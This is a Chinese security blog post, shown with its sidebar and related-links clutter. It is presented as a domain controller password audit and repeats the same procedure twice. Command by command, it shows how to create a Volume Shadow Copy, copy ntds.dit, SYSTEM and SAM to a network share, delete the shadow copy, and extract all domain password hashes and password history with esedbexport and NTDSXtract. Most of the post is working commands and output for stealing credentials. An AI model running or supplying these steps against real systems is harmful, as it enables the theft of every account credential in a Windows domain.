- 浏览: 287846 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
参考:http://blog.cyberis.co.uk/2012/06/password-audit-of-domain-controller.html
1. 创建Shadow Copy
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
2. 从shadow copy中copy文件
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM \\<some network share>\
3. 删除创建的shadow copy
4. 从http://sourceforge.net/projects/libesedb/下载libesedb
5. 从ntds.dit中提取数据库表
$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit.export <ntds.dit file>
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
6. 使用NTDSXtract解析表
~/NTDSXtract $ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
1. 创建Shadow Copy
引用
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
2. 从shadow copy中copy文件
引用
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM \\<some network share>\
3. 删除创建的shadow copy
引用
cscript vssown.vbs /delete <ID>
4. 从http://sourceforge.net/projects/libesedb/下载libesedb
5. 从ntds.dit中提取数据库表
引用
$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit.export <ntds.dit file>
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
6. 使用NTDSXtract解析表
引用
~/NTDSXtract $ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
发表评论
-
[图] windows 10
2015-08-18 20:37 311网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 589https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 530原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1633原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 474引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 778原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 411原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 498原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2876原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 323原文地址:http://blog.gdssecurity.co ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4126原文地址:https://jimshaver.net/2015 ... -
[转]John the ripper hash format cheetsheet
2015-03-10 01:30 1034原文地址:http://pentestmonkey.net/c ... -
window增加硬盘性能方法
2015-02-05 01:03 355参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 804原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 963https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 943原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1543下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1028原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3807原文地址:https://cyberarms.wordpres ... -
man crunch
2014-12-28 23:35 400http://adaywithtape.blogspot.co ...
相关推荐
7. **域控制器发现**:用于定位网络中的域控制器,这在攻击者试图提升权限或进行横向移动时非常重要。 8. **安全组成员分析**:分析域中的安全组成员,找出高权限用户或特权账户。 9. **密码策略检测**:可能包含...
在描述中提到的"浏览二进制 十进制 十六进制转换浏览"功能,指的是Dump查看器能够以三种不同的数值表示方式展示数据,这对于理解内存中的数据至关重要。二进制(Binary)是最基础的数字系统,由0和1组成,常用于...
Dump文件编辑中文版 分析DUMP文件数据 修改数据
DumpTool主要用来在用户机器上对目标进程生成dump文件,定位“卡死”、Crash等问题。 (1)MiniDump: 表示生成一个包含必要信息的dump文件,文件大小约200-500k,具体Flag =MiniDumpNormal|...
在IT领域,dump文件通常是指系统崩溃时产生的内存转储,或者数据库的备份文件,它们包含了大量的二进制数据,可能包含了系统状态、程序错误信息等关键数据。这样的文件对于故障排查和问题诊断非常有用,但因为是非...
C++ 自动dump,也称为自动崩溃转储(Automatic Dump),是编程中一种常见的调试技术。当应用程序出现异常或者崩溃时,系统会自动保存当前进程的状态,包括内存映射、堆栈信息、线程状态等,形成一个dump文件。这个...
现在,我们来详细讲解如何在C++ Windows工程中生成dump文件。 首先,我们需要包含相应的头文件。在`main.cpp`中,引入`windows.h`和`dbghelp.h`,这两个头文件分别提供了Windows API和用于处理dump文件的API: ```...
dump命令用于备份文件系统 ,dump为备份工具程序,可将目录或整个文件系统备份至指定的设备,或备份成一个大文件。 语法格式:dump [参数] 常用参数: -0123456789 备份的层级 -b 指定区块的大小,单位为KB ...
标题 "dump1090-win.1.10.3010.14_dump1090win_dump1090_eastixg_" 指的是一个针对Windows平台的dump1090软件的特定版本。这个软件主要用于接收和处理航空雷达数据,特别是与RTL-SDR(低成本软件定义无线电)设备...
标题中的“dump文件修改”指的是在信息技术领域中对数据进行备份或分析的一种操作。Dump文件通常是由硬件设备,如IC卡(集成电路卡),通过特定工具读取并生成的数据副本,这些副本包含了卡片上的原始信息。在本场景...
在实际应用中,"dumpTest"这样的文件名可能是生成的Dump文件的示例,开发者可以通过分析这个文件找出程序中的错误。 总的来说,C++生成Dump文件是一项重要的调试技术,它使得在程序异常时能快速定位问题,提高了...
如何在让docker中运行的进程生成core dump文件
在C++编程中,捕获内存相关错误并生成dump文件是一项关键的技术,它能帮助开发者在程序崩溃或出现异常时分析问题原因。"DUMP_C++_dump_"这个标题暗示了我们将讨论如何在C++中处理内存错误并创建内存转储(dump)文件...
利用调试工具,开发者可以从Coredump文件中获取到程序崩溃时的内存快照、寄存器值、运行堆栈等信息,然后通过源代码和调试信息逐步定位问题所在。 五、开始使用Coredump 一旦Coredump文件生成,并且准备工作就绪,...
rtmpdump是一个开源工具,主要用于从RTMP(Real-Time Messaging Protocol)流中捕获和下载媒体内容,如视频和音频。这个压缩包“rtmpdump.zip”包含了在Visual Studio环境中编译rtmpdump项目所需的所有关键文件,...
在IT行业中,尤其是在移动设备和嵌入式系统的故障排查领域,ramdump是一个至关重要的概念。ramdump-tools是一款针对高通方案设备的专业宕机本地ramdump分析工具,它提供了比高通在线宕机分析工具qcap更为强大和便捷...
- **/proc/sys/kernel/core_uses_pid**:此文件用于控制是否在core dump文件名中包含进程ID。如果其值为1,则文件名会包含进程ID,便于区分不同的core dump文件。例如: ```sh echo 'core.%p' > /proc/sys/kernel...
文件列表中的`ha39.jar`可能是用于生成或分析heapdump的工具,它可能包含了特定的内存分析算法或工具集。这类工具通常需要与JVM配合使用,通过读取heapdump文件,提供更便捷的分析界面和功能。 `readme.zip`可能...
总的来说,将Dump文件转为txt是故障排查过程中的一个重要步骤,通过这种方式,我们可以更直观地查看和理解系统或应用在崩溃时的状态,从而有效地解决问题。不过,这个过程需要一定的调试知识和经验,因此对于初学者...
3. **解析dump文件**:运行dump分析工具,输入dump文件的路径,工具会自动生成报告,展示内存、线程、类加载器等方面的信息。 4. **分析报告**:仔细阅读生成的报告,查找异常、警告或性能问题的线索。对于ha398....